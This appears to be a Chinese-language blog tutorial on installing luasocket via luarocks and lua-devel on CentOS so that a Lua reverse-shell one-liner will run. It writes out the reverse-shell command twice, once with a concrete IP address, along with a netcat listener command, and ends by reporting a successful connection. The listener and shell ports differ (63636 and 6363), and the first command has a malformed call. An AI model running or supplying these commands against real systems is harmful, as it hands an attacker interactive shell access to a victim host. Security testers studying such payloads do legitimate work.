lua反弹环境配置(luasocket安装)
免责声明:由于传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本篇文章作者不为此承担任何责任,一旦造成后果请自行承担!
环境配置问题
在使用lua语言进行反弹shell测试时,执行相关命令提示缺少socket.lua文件
#lua -e "local socket=require('socket');local os=require('os');t=socket.tcp();t('10.103.102.26','7878');os.execute('/bin/sh -i <&3 >&3 2>&3');"
lua: (command line):1: module 'socket' not found:
no field package.preload['socket']
no file './socket.lua'
no file '/usr/share/lua/5.1/socket.lua'
no file '/usr/share/lua/5.1/socket/init.lua'
no file '/usr/lib64/lua/5.1/socket.lua'
no file '/usr/lib64/lua/5.1/socket/init.lua'
no file './socket.so'
no file '/usr/lib64/lua/5.1/socket.so'
no file '/usr/lib64/lua/5.1/loadall.so'
stack traceback:
[C]: in function 'require'
(command line):1: in main chunk
[C]: ?
按照网上查询的内容并没找到有效的解决Linux主机上出现的这个问题。偶然看到luarocks 是lua包管理器,就想到用luarocks来安装luasocket。
#yum install luarocks
已加载插件:fastestmirror, product-id, search-disabled-repos, subscription-manager
This system is not registered with an entitlement server. You can use subscription-manager to register.
Loading mirror speeds from cached hostfile
* base: mirrors.bfsu.edu.cn
* extras: mirrors.bfsu.edu.cn
* updates: mirrors.bfsu.edu.cn
没有可用软件包 luarocks。
错误:无须任何处理
yum安装没找到包,也没换yum源直接搜索离线luarocks rpm包进行安装,访问:luarocks-2.3.0-1.el7.x86_64.rpm CentOS 7, RHEL 7 Download (pkgs.org)](https://rhel.pkgs.org/7/epel-x86_64/luarocks-2.3.0-1.el7.x86_64.rpm.html) 下载x86_64rpm包:https://dl.fedoraproject.org/pub/epel/7/x86_64/Packages/l/luarocks-2.3.0-1.el7.x86_64.rpm
执行命令安装: rpm -ivh luarocks-2.3.0-1.el7.x86_64.rpm
然后安装luasocket
luarocks install luasocket
安装提示报错:
这个错误提示是由于缺少lua.h文件导致的。lua.h是Lua的头文件,需要在编译LuaSocket库时使用。这个错误可能是由于没有正确安装Lua开发包(Lua development package)导致的,Lua开发包包含了编译Lua库所需的头文件和其他依赖项。解决这个问题,需要安装Lua开发包
yum install lua-devel
安装成功后再次执行安装luasocket成功
luarocks install luasocket
建立监听等待成功建立连接
nc -lvvp 63636
执行lua 反弹shell命令
lua -e "local socket=require('socket');local os=require('os');t=socket.tcp();t:connect('xx.xx.xx.xx','6363');os.execute('/bin/sh -i <&3 >&3 2>&3');"
xx.xx.xx.xx为建立监听的主机ip地址
成功建立连接
